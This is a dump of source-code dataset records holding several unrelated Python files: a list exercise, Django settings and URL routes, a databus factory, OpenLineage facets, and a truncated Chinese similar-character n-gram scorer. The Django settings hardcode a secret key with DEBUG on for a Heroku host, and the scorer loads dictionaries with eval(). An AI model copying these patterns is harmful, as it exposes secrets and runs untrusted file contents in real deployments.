blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
38230ca8d3651d93fb529af377a3b02deb0dae18 | 699ca6931be13ad8a3f4eed26dade7f37cd00bb4 | /temp/bicycles.py | efbcd87b53c9baa13bc9da53e090e99becccbafb | [] | no_license | TimliangLei/studyPython | 5638f317fa01a40b6e3bb3d0b6dd60685f2b07f3 | fb758b42bb01326444dddc1112e9b14e17177b79 | refs/heads/master | 2021-10-30T09:41:24.423533 | 2019-04-26T02:46:00 | 2019-04-26T02:46:00 | 124,232,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | bicycles=['trek','cannondale','redline','speciallized']
print(bicycles)
print(bicycles[0].title())
print(bicycles[-1])#返回最后一个元素值
message="My first bicycle was a "+bicycles[0].title()+"."
print(message)
| [
"timlianglei@126.com"
] | timlianglei@126.com |
8e747b87fe26be4867117e37b2c24add1e4668e0 | 7f0822e81575cd306edfea299b6f7d5356b603e5 | /one_two_jango/settings.py | a63edb480345a3d3e6d6c7444c2a993a1e98fea5 | [
"BSD-3-Clause"
] | permissive | jia1/one-two-jango | 0f68af1e9e0127eba9db16c3f9b17f172b1843b2 | 49393e2699f4785e7f7d218f9de6a4592e23a39e | refs/heads/master | 2021-07-05T12:09:26.710500 | 2017-09-29T12:32:58 | 2017-09-29T12:32:58 | 104,497,160 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,444 | py | """
Django settings for one_two_jango project.
Generated by 'django-admin startproject' using Django 1.11.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'jrncnn0r-mv#+l9y=vu%53)h7c&jfi#^2r4hyce)p1(mipym%!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['one-two-jango.herokuapp.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'one_two_jango.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'one_two_jango.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
STATICFILES_DIRS = (os.path.join(PROJECT_ROOT, 'static'),)
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
| [
"jiayeerawr@gmail.com"
] | jiayeerawr@gmail.com |
c66645032b93cfe99a40b95fce3b5079076f0f63 | 3f095a37cae521bdb06aa98c200563d80eb4d7c5 | /django-projects/sosio/myapi/urls.py | 7dc55683978b6928874ec768504d4e2d1c43607f | [] | no_license | sArun-kumar/create | 83363ae3eaf98d3682f818b7f7987b431f348fa7 | c7f7ce744c64042f6a67d5666814f47e76885604 | refs/heads/master | 2020-09-23T21:11:59.386480 | 2019-12-03T09:59:39 | 2019-12-03T09:59:39 | 225,586,385 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | from django.urls import include, path
from rest_framework import routers
from . import views
router = routers.DefaultRouter()
router.register(r'Article', views.ArticleViewSet)
urlpatterns = [
path('', include(router.urls)),
path('api-auth/', include('rest_framework.urls', namespace='rest_framework'))
] | [
"57952933+sArun-kumar@users.noreply.github.com"
] | 57952933+sArun-kumar@users.noreply.github.com |
62a90103f21a16407a8f42e0a21947b511a5a5cc | 622bd4fb4cb50361a5e887544d92a04debb0dd2b | /databus/driver/abstract_factory.py | a69171d86050ecd1512ef2bc9a59efa3c6862f46 | [
"Apache-2.0"
] | permissive | tedrepo/databus | aec06bd28f761ca4beff290fc856e93dd2948c07 | 0f1f290c1b061175a652c3f72efc0d091a5e08c9 | refs/heads/master | 2022-12-01T03:10:15.182783 | 2020-08-08T18:40:54 | 2020-08-08T18:40:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,695 | py | """ Abstract driver factory module """
from abc import ABC, abstractmethod
from enum import Enum
from databus.driver.abstract_driver import AbstractDriver
from databus.processor.abstract_factory import AbstractProcessorFactory
from databus.pqueue.abstract_factory import AbstractQueueFactory
from databus.puller.abstract_factory import AbstractPullerFactory
from databus.pusher.abstract_factory import AbstractPusherFactory
class DriverCreationError(Exception):
""" Driver creation exception """
class ErrorCode(Enum):
""" Driver creation error code """
cant_create_instance: 1
parameter_missing: 2
def __init__(self, p_error_code: ErrorCode, p_module: str = ""):
super().__init__()
self.error_code = p_error_code
if p_module is None:
self.module = ""
else:
self.module = p_module
@property
def message(self) -> str:
""" Error message as string """
if self.error_code == DriverCreationError.ErrorCode.cant_create_instance:
return "Can't create " + self.module + " driver instance"
return "Driver creation error"
class AbstractDriverFactory(ABC): # pylint: disable=R0903
""" Abstract driver factory class """
@abstractmethod
def create_driver(self, # pylint: disable=R0913
p_module: str,
p_queue_factory: AbstractQueueFactory,
p_processor_factory: AbstractProcessorFactory,
p_puller_factory: AbstractPullerFactory,
p_pusher_factory: AbstractPusherFactory
) -> AbstractDriver:
""" Driver creation """
| [
"kerem@koseoglu.info"
] | kerem@koseoglu.info |
6d33c0003e476ec33c351028029173031c719722 | 97cfe02f314895419b741cdc88eeb17c0f9df0dd | /integration/common/openlineage/common/provider/great_expectations/facets.py | 0612c7d9bbe4ef56aff7cc6fe788af7996ebbde7 | [
"Apache-2.0"
] | permissive | briansorahan/OpenLineage | b801827a40fb0a61feff4348d8dff1391a26ed39 | c3aa70e161244091969951d0da4f37619bcbe36f | refs/heads/main | 2023-08-25T10:55:34.352490 | 2021-10-28T11:49:58 | 2021-10-28T11:49:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,735 | py | from typing import List, Optional, Union, Dict
import attr
from great_expectations.core import IDDict
from great_expectations.core.batch import BatchMarkers, BatchDefinition
from great_expectations.core.id_dict import BatchSpec, BatchKwargs
from openlineage.client.facet import BaseFacet
from openlineage.common.provider.great_expectations.results import GreatExpectationsAssertion
@attr.s
class GreatExpectationsRunFacet(BaseFacet):
"""
Custom facet which describes the instance of GreatExpectations and the suite configuration
"""
great_expectations_version = attr.ib()
expectation_suite_name: str = attr.ib()
run_id: Dict = attr.ib(converter=lambda x: x.to_json_dict())
expectation_suite_meta: Dict = attr.ib()
validation_time: str = attr.ib()
batch_spec: Optional[BatchSpec] = attr.ib(default=None)
batch_markers: Optional[BatchMarkers] = attr.ib(default=None)
batch_kwargs: Optional[BatchKwargs] = attr.ib(default=None)
active_batch_definition: Union[None, IDDict, BatchDefinition] = attr.ib(default=None)
batch_parameters = attr.ib(default=None)
@staticmethod
def _get_schema() -> str:
return "https://github.com/OpenLineage/OpenLineage/tree/main/integration/common/openlineage/common/provider/ge-run-facet.json" # noqa
@attr.s
class GreatExpectationsAssertionsDatasetFacet(BaseFacet):
"""
This facet represents passed/failed status of asserted expectations on dataset
"""
assertions: List[GreatExpectationsAssertion] = attr.ib()
@staticmethod
def _get_schema() -> str:
return "https://github.com/OpenLineage/OpenLineage/tree/main/integration/common/openlineage/common/provider/ge-assertions-dataset-facet.json" # noqa
| [
"noreply@github.com"
] | briansorahan.noreply@github.com |
b3af60e9a9eafa6c29e2e9a9f392486a6fc29ad4 | 30402db627b01e28347bf94cc4be6af68a0a7d2b | /yuzhao.py | d291f1953aefb47df074d175e702801af8b4210e | [] | no_license | SUMORAN/character_pair | ecd47d9a8be128d868ab19c207edec3c056ac61c | dff64303c3193d6932618bb7650ab37901bc15f6 | refs/heads/master | 2020-04-26T16:00:29.324610 | 2019-03-04T04:00:22 | 2019-03-04T04:00:22 | 173,664,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,078 | py | # -*- encoding: utf-8 -*-
import math
import random
import codecs
RAW_TEXT_PATH = "zhangwenbin.txt" # 未分词中文语料
PARTED_TEXT_PATH = "parted_text.txt" # 分词后中文语料
WORD2IDX_PATH = 'word2idx_dic.txt'
IDX2WORD_PATH = 'idx2word_dic.txt'
TEST_PATH = 'test.txt'
PROP_DICT_PATH = 'prop_dict.txt'
similar_word = [
"哀", "衰", "衷",
"嗳", "暧", "暖",
"巴", "巳",
"拔", "拨",
"斑", "班",
"人", "入",
"一", "-",
"二", "=",
"戋", "践",
"己", "已",
"候", "侯",
"日", "曰",
"间", "问",
"央", "决",
'粤', "粵"
]
# 移除每行文本中的无用词语和标点
def rm_useless_tokens(line):
new_line = line.replace('.', '').replace('(', '').replace(')', '')\
.replace('?', ' ').replace('!', ' ').replace('/', '').replace(',', '').replace('@', '')\
.replace("\"", " ").replace(":", " ").replace('【', '').replace('】', '').replace('+', '')\
.replace(';', '').replace('*', '').replace('_', '').replace('\'s', '').replace('\' ', '').replace('\n', '')\
.replace('~', '').replace('', '').replace('。', '').replace('、', '').replace('|', '').replace('1', '9')\
.replace('2', '9').replace('3', '9').replace('4', '9').replace('5', '9').replace('6', '9').replace('7', '9') \
.replace('8', '9').replace('9', '9').replace('.', '9').replace('/', '').replace('“', '').replace('”', '')\
.replace('‘', '').replace('’', '')
return new_line.strip().lower()
'''
功能:分词
参数:
raw_text_path:待分词文本文件
parted_text_path:分词后文本文件
'''
def ChineseParticiple(raw_text_path=RAW_TEXT_PATH, parted_text_path=PARTED_TEXT_PATH):
print('\033[1;33mStart participate Chinese\033[0m')
f = codecs.open(raw_text_path, 'r', encoding='utf-8')
target = codecs.open(parted_text_path, 'a', encoding='utf-8')
# parted_text = []
lineNum = 0
for line in f.readlines():
lineNum = lineNum + 1
# print('---------processing', lineNum, 'article---------')
# seg_list = jieba.cut(line, cut_all=False)
# line = clean_str(line)
# line = rm_useless_tokens(line).strip()
seg_list = []
for x in line:
if x != ' ':
seg_list.append(x)
# parted_text.append(x)
# seg_list.append('\n')
line_seg = '\n'.join(seg_list)
target.writelines(line_seg)
print('\033[1;33mparticipate Chinese DONE!\033[0m')
f.close()
target.close()
# return parted_text
'''
功能:从分词后文件生成字典
参数:
parted_text_path:分词后文本文件
返回值:word_to_ix 和 ix_to_word(字典)
'''
def generate_dic(parted_text_path=PARTED_TEXT_PATH):
f1 = open(parted_text_path, 'r', encoding='utf-8')
print('Load raw text……')
sentence = []
# num = 0
for line in f1.readlines():
# num += 1
# if num > 100000:
# break
if line != '': # 去除空白行
# if line != '' and line != '9': # 去除空白行
sentence.append(line.strip())
raw_text = sentence
word_to_ix = {}
ix_to_word = {}
# 词汇表
vocab = set(raw_text)
vocab_size = len(vocab)
# word to idx
for i, word in enumerate(vocab):
word_to_ix[word] = i
ix_to_word[i] = word
return word_to_ix, ix_to_word
'''
功能:将字典保存到本地
参数:
dic: 待保存的字典
dic_path:本地字典文件路径
'''
def save_dic(dic, dic_path):
fw = open(dic_path, 'w+', encoding='utf-8')
fw.write(str(dic)) # 把字典转化为str
fw.close()
'''
功能:从本地读取字典
参数:
dic_path:本地字典文件路径
返回值:字典
'''
def load_dic(dic_path):
fr = open(dic_path, 'r+', encoding='utf-8')
dic = eval(fr.read()) # 读取的str转换为字典
fr.close()
return dic
'''
功能:载入分词后文件
参数:
parted_text_path:分词后文本文件
返回值:文本对应的list
'''
def load_rawText(parted_text_path=PARTED_TEXT_PATH):
f1 = open(parted_text_path, 'r', encoding='utf-8')
print('Load raw text……')
sentence = []
# num = 0
for line in f1.readlines():
# num += 1
# if num > 100000:
# break
if line != '': # 去除空白行
# if line != '' and line != '9': # 去除空白行
sentence.append(line.strip())
return sentence
'''
功能:按照字典将文本替换为对应idx
参数:
raw_text:待替换的文本list
word_to_ix:word to idx字典
返回值:文本对应的数字表示list
'''
def word2idx(raw_text, word_to_ix):
raw_text_idx = []
for item in raw_text:
if item in word_to_ix:
item = item.replace(item, str(word_to_ix[item]))
else:
item = item.replace(item, str(random.randint(1, 2000)))
raw_text_idx.append(item)
return raw_text_idx
'''
功能:根据训练语料生成概率字典
参数:
parted_text_path: 分词后文件路径
word2idx_path: word to idx 字典路径
save_path: 生成的字典保存路径
'''
def generate_propdic(parted_text_path, word2idx_path, idx2word_path, wordlist, save_path):
raw_text = load_rawText(parted_text_path)
word2idx_dic = load_dic(word2idx_path)
idx2word_dic = load_id2word(idx2word_path)
raw_text_idx = word2idx(raw_text, word2idx_dic)
prop_dict = {}
print('正在计算context_single')
# 考虑单边
context_single = []
# window = 0
for i in range(0, len(raw_text_idx)):
whole = [raw_text_idx[i]]
context_single.append(whole)
# window = 1
for i in range(1, len(raw_text_idx) - 1):
whole_left = [raw_text_idx[i - 1], raw_text_idx[i]]
whole_right = [raw_text_idx[i], raw_text_idx[i + 1]]
context_single.append(whole_left)
context_single.append(whole_right)
# window = 2
for i in range(2, len(raw_text_idx) - 2):
whole_left = [raw_text_idx[i - 2], raw_text_idx[i - 1], raw_text_idx[i]]
whole_right = [raw_text_idx[i], raw_text_idx[i + 1], raw_text_idx[i + 2]]
context_single.append(whole_left)
context_single.append(whole_right)
print('正在计算context_double')
# 考虑双边
context_double = []
whole_double = []
# window = 1
for i in range(1, len(raw_text_idx) - 1):
whole = [raw_text_idx[i - 1], raw_text_idx[i], raw_text_idx[i + 1]]
context_temp = [raw_text_idx[i - 1], raw_text_idx[i + 1]]
whole_double.append(whole)
context_double.append(context_temp)
# window = 2
for i in range(2, len(raw_text_idx) - 2):
whole = [raw_text_idx[i - 2], raw_text_idx[i - 1], raw_text_idx[i],
raw_text_idx[i + 1], raw_text_idx[i + 2]]
context_temp = [raw_text_idx[i - 2], raw_text_idx[i - 1],
raw_text_idx[i + 1], raw_text_idx[i + 2]]
whole_double.append(whole)
context_double.append(context_temp)
wordlist = word2idx(wordlist, word2idx_dic)
# V是所有的可能的不同的N-Gram的数量
V1 = len(context_single)
V2 = len(context_double)
# Add-k Smoothing(Lidstone’s law) 小于1的正数 k
k = 0.1
hasdone = dict()
for i in range(0, len(raw_text_idx)):
print("progress: ", str(float(i)/len(raw_text_idx)))
if raw_text_idx[i] in wordlist:
if raw_text_idx[i] not in hasdone:
print('------------------------------')
print('正在计算“{}”相关词的概率'.format(raw_text[i]))
prop_dict[raw_text_idx[i]] = (context_single.count([raw_text_idx[i]])+k)/V1
hasdone[raw_text_idx[i]] = list()
# 左边有两个字及以上
if i > 1:
left_combine1 = idx2word_dic[int(raw_text_idx[i-1])] + idx2word_dic[int(raw_text_idx[i])]
left_combine2 = idx2word_dic[int(raw_text_idx[i-2])] + idx2word_dic[int(raw_text_idx[i-1])] + idx2word_dic[int(raw_text_idx[i])]
if left_combine1 not in hasdone[raw_text_idx[i]]:
# 单边左
prop_dict[(raw_text_idx[i-1],raw_text_idx[i])] = (context_single.count([raw_text_idx[i-1],raw_text_idx[i]]) + \
k)/(context_single.count([raw_text_idx[i-1]]) + k*V1)
print('prop_dict[raw_text_idx[i-1],raw_text_idx[i]]:',prop_dict[(raw_text_idx[i-1],raw_text_idx[i])])
hasdone[raw_text_idx[i]].append(left_combine1)
if left_combine2 not in hasdone[raw_text_idx[i]]:
prop_dict[(raw_text_idx[i-2],raw_text_idx[i-1],raw_text_idx[i])] = (context_single.count([raw_text_idx[i-2],raw_text_idx[i-1],raw_text_idx[i]]) + k)/(context_single.count([raw_text_idx[i-2],raw_text_idx[i-1]]) + k*V1)
hasdone[raw_text_idx[i]].append(left_combine2)
# 右边有两个字及以上
if i < len(raw_text_idx)-2 :
right_combine1 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
right_combine2 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])] + idx2word_dic[int(raw_text_idx[i+2])]
right_combine3 = idx2word_dic[int(raw_text_idx[i-1])] + idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
right_combine4 = idx2word_dic[int(raw_text_idx[i-2])] + idx2word_dic[int(raw_text_idx[i-1])] + idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])] + idx2word_dic[int(raw_text_idx[i+2])]
if right_combine1 not in hasdone[raw_text_idx[i]]:
# 单边右
prop_dict[(raw_text_idx[i],raw_text_idx[i+1])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1]]) + \
k)/(context_single.count([raw_text_idx[i+1]]) + k*V1)
hasdone[raw_text_idx[i]].append(right_combine1)
if right_combine2 not in hasdone[raw_text_idx[i]]:
prop_dict[(raw_text_idx[i],raw_text_idx[i+1],raw_text_idx[i+2])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1],\
raw_text_idx[i+2]]) + k)/(context_single.count([raw_text_idx[i+1],raw_text_idx[i+2]]) + k*V1)
hasdone[raw_text_idx[i]].append(right_combine2)
if right_combine3 not in hasdone[raw_text_idx[i]]:
# 双边
prop_dict[(raw_text_idx[i-1],raw_text_idx[i],raw_text_idx[i+1])] = (whole_double.count([raw_text_idx[i-1],raw_text_idx[i],\
raw_text_idx[i+1]]) + k)/(context_double.count([raw_text_idx[i - 1], raw_text_idx[i + 1]]) + k*V2)
hasdone[raw_text_idx[i]].append(right_combine3)
if right_combine4 not in hasdone[raw_text_idx[i]]:
prop_dict[(raw_text_idx[i - 2], raw_text_idx[i - 1], raw_text_idx[i], raw_text_idx[i + 1], raw_text_idx[i + 2])]\
= (whole_double.count( [raw_text_idx[i - 2], raw_text_idx[i - 1], raw_text_idx[i],raw_text_idx[i + 1], raw_text_idx[i + 2]])\
+ k)/(context_double.count( [raw_text_idx[i - 2], raw_text_idx[i - 1], raw_text_idx[i + 1], raw_text_idx[i + 2]]) + k*V2)
hasdone[raw_text_idx[i]].append(right_combine4)
# 右边只有一个字
elif i == len(raw_text_idx)-2 :
right_combine1 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
right_combine3 = idx2word_dic[int(raw_text_idx[i-1])] + idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
if right_combine1 not in hasdone[raw_text_idx[i]]:
# 单边右
prop_dict[(raw_text_idx[i],raw_text_idx[i+1])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1]]) + \
k)/(context_single.count([raw_text_idx[i+1]]) + k*V1)
hasdone[raw_text_idx[i]].append(right_combine1)
if right_combine3 not in hasdone[raw_text_idx[i]]:
# 双边
prop_dict[(raw_text_idx[i-1],raw_text_idx[i],raw_text_idx[i+1])] = (whole_double.count([raw_text_idx[i-1],raw_text_idx[i],\
raw_text_idx[i+1]]) + k)/(context_double.count([raw_text_idx[i - 1], raw_text_idx[i + 1]]) + k*V2)
hasdone[raw_text_idx[i]].append(right_combine3)
# 右边没有字了
else:
pass
# 左边只有一个字
elif i == 1:
left_combine1 = idx2word_dic[int(raw_text_idx[i-1])] + idx2word_dic[int(raw_text_idx[i])]
left_combine2 = idx2word_dic[int(raw_text_idx[i-1])] + idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
if left_combine1 not in hasdone[raw_text_idx[i]]:
# 单边左
prop_dict[(raw_text_idx[i-1],raw_text_idx[i])] = (context_single.count([raw_text_idx[i-1],raw_text_idx[i]]) + \
k)/(context_single.count([raw_text_idx[i-1]]) + k*V1)
hasdone[raw_text_idx[i]].append(left_combine1)
if left_combine2 not in hasdone[raw_text_idx[i]]:
# 双边
prop_dict[(raw_text_idx[i-1],raw_text_idx[i],raw_text_idx[i+1])] = (whole_double.count([raw_text_idx[i-1],raw_text_idx[i],\
raw_text_idx[i+1]]) + k)/(context_double.count([raw_text_idx[i - 1], raw_text_idx[i + 1]]) + k*V2)
hasdone[raw_text_idx[i]].append(left_combine2)
# 右边有两个字及以上
if i < len(raw_text_idx)-2 :
right_combine1 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
right_combine2 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])] + idx2word_dic[int(raw_text_idx[i+2])]
if right_combine1 not in hasdone[raw_text_idx[i]]:
# 单边右
prop_dict[(raw_text_idx[i],raw_text_idx[i+1])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1]]) + \
k)/(context_single.count([raw_text_idx[i+1]]) + k*V1)
hasdone[raw_text_idx[i]].append(right_combine1)
if right_combine2 not in hasdone[raw_text_idx[i]]:
prop_dict[(raw_text_idx[i],raw_text_idx[i+1],raw_text_idx[i+2])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1],\
raw_text_idx[i+2]]) + k)/(context_single.count([raw_text_idx[i+1],raw_text_idx[i+2]]) + k*V1)
hasdone[raw_text_idx[i]].append(right_combine2)
# 右边只有一个字
elif i == len(raw_text_idx)-2 :
right_combine1 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
if right_combine1 not in hasdone[raw_text_idx[i]]:
# 单边右
prop_dict[(raw_text_idx[i],raw_text_idx[i+1])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1]]) + k)/(\
context_single.count([raw_text_idx[i+1]]) + k*V1)
hasdone[raw_text_idx[i]].append(right_combine1)
else:
pass
# 左边没有字了
elif i == 0:
# 右边有两个字及以上
if i < len(raw_text_idx)-2 :
right_combine1 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
right_combine2 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])] + idx2word_dic[int(raw_text_idx[i+2])]
if right_combine1 not in hasdone[raw_text_idx[i]]:
# 单边右
prop_dict[(raw_text_idx[i],raw_text_idx[i+1])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1]]) + \
k)/(context_single.count([raw_text_idx[i+1]]) + k*V1)
hasdone[raw_text_idx[i]].append(right_combine1)
if right_combine2 not in hasdone[raw_text_idx[i]]:
prop_dict[(raw_text_idx[i],raw_text_idx[i+1],raw_text_idx[i+2])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1],\
raw_text_idx[i+2]]) + k)/(context_single.count([raw_text_idx[i+1],raw_text_idx[i+2]]) + k*V1)
hasdone[raw_text_idx[i]].append(right_combine2)
# 右边只有一个字
elif i == len(raw_text_idx)-2 :
right_combine1 = idx2word_dic[int(raw_text_idx[i])] + idx2word_dic[int(raw_text_idx[i+1])]
if right_combine1 not in hasdone[raw_text_idx[i]]:
# 单边右
prop_dict[(raw_text_idx[i],raw_text_idx[i+1])] = (context_single.count([raw_text_idx[i],raw_text_idx[i+1]]) + \
k)/(context_single.count([raw_text_idx[i+1]]) + k*V1)
hasdone[raw_text_idx[i]].append(right_combine1)
else:
pass
print(prop_dict)
save_dic(prop_dict, save_path)
def load(word2idx_path, prop_dict_path):
print('载入概率字典----')
word2idx_dic = load_dic(word2idx_path)
prop_dict = load_dic(prop_dict_path)
return word2idx_dic, prop_dict
def load_id2word(idx2word_path):
idx2word_dic = load_dic(idx2word_path)
return idx2word_dic
def judge_word(candidate_list, prop_dict_path, word2idx_path, test_path=None, test_sentence=None):
print('Start judge-------------------')
if test_path is not None:
f2 = open(test_path, 'r', encoding='utf-8')
print('Load test text……')
sentence = []
for line in f2.readlines():
# line = rm_useless_tokens(line).strip()
for x in line:
if x != ' ' and x != '':
sentence.append(x)
context_all = sentence
if test_sentence is not None:
context_all = list(test_sentence.strip())
context_idx = word2idx(context_all, word2idx_dic)
i = 0
num = 0
left = 0
right = 0
for index in range(len(context_all)):
if context_all[index] in candidate_list:
prop={}
i += 1
print('第{}处:'.format(i))
if index > 1 and index < len(context_all)-2:
num = 3
left = 2
right = 2
elif index == 1:
num = 2
left = 1
if index < len(context_all)-2:
right = 2
elif index == len(context_all)-2:
right = 1
elif index == len(context_all)-1:
right = 0
elif index == 0:
num = 1
left = 0
if index < len(context_all)-2:
right = 2
elif index == len(context_all)-2:
right = 1
elif index == len(context_all)-1:
right = 0
for candidate in candidate_list:
p = 0
candidata_idx = str(word2idx_path[candidate])
print(candidata_idx)
if left == 2 and right == 2:
left1 = str(context_idx[index-1])
left2 = str(context_idx[index-2])
right1 = str(context_idx[index+1])
right2 = str(context_idx[index+2])
print(left1, left2, right1, right2)
if candidata_idx in prop_dict_path and (left1,candidata_idx) in prop_dict_path and (candidata_idx,right1) in prop_dict_path and (left2, left1,candidata_idx) in prop_dict_path and (candidata_idx, right1, right2) in prop_dict_path and (left1, candidata_idx, right1) in prop_dict_path and (left2, left1, candidata_idx, right1, right2) in prop_dict_path:
print("-----------1-----------")
p = (prop_dict_path[candidata_idx]
+ prop_dict_path[(left1, candidata_idx)]
+ prop_dict_path[(candidata_idx, right1)]
+ prop_dict_path[(left2, left1, candidata_idx)]
+ prop_dict_path[(candidata_idx, right1, right2)]
+ prop_dict_path[(left1, candidata_idx, right1)]
+ prop_dict_path[(left2, left1, candidata_idx, right1, right2)]
)/7
elif left == 1 and right == 2:
left1 = str(context_idx[index-1])
right1 = str(context_idx[index+1])
right2 = str(context_idx[index+2])
if candidata_idx in prop_dict_path and (left1,candidata_idx) in prop_dict_path and (candidata_idx, right1) in prop_dict_path and (candidata_idx, right1, right2) in prop_dict_path and (left1, candidata_idx, right1) in prop_dict_path:
print("-----2")
p = (prop_dict_path[candidata_idx]
+ prop_dict_path[(left1,candidata_idx)]
+ prop_dict_path[(candidata_idx, right1)]
+ prop_dict_path[(candidata_idx, right1, right2)]
+ prop_dict_path[(left1, candidata_idx, right1)]
)/5
elif left == 1 and right == 1:
print("------------3----------")
left1 = str(context_idx[index-1])
right1 = str(context_idx[index+1])
if candidata_idx in prop_dict_path and (left1, candidata_idx) in prop_dict_path and (candidata_idx, right1) in prop_dict_path and (left1, candidata_idx, right1) in prop_dict_path:
p = (prop_dict_path[candidata_idx]
+ prop_dict_path[(left1, candidata_idx)]
+ prop_dict_path[(candidata_idx, right1)]
+ prop_dict_path[(left1, candidata_idx, right1)]
)/4
elif left == 1 and right == 0:
print("----------4--------------")
left1 = str(context_idx[index-1])
if candidata_idx in prop_dict_path and (left1, candidata_idx) in prop_dict_path:
p = (prop_dict_path[candidata_idx]
+ prop_dict_path[(left1, candidata_idx)]
)/2
elif left == 0 and right == 2:
right1 = str(context_idx[index+1])
right2 = str(context_idx[index+2])
if candidata_idx in prop_dict_path and (candidata_idx, right1) in prop_dict_path and (candidata_idx, right1, right2) in prop_dict_path:
p = (prop_dict_path[candidata_idx]
+ prop_dict_path[(candidata_idx, right1)]
+ prop_dict_path[(candidata_idx, right1, right2)]
)/3
elif left == 0 and right == 1:
right1 = str(context_idx[index+1])
if candidata_idx in prop_dict_path and (candidata_idx, right1) in prop_dict_path:
p = (prop_dict_path[candidata_idx]
+ prop_dict_path[(candidata_idx, right1)]
)/2
elif left == 0 and right == 0:
if candidata_idx in prop_dict_path:
p = prop_dict_path[candidata_idx]
prop[candidate] = p
proplist = sorted(prop.items(),key = lambda x:x[1])
print(proplist)
if proplist[-1][1] == proplist[-2][1]:
word = '不能确定是哪个字'
else:
word = proplist[-1][0]
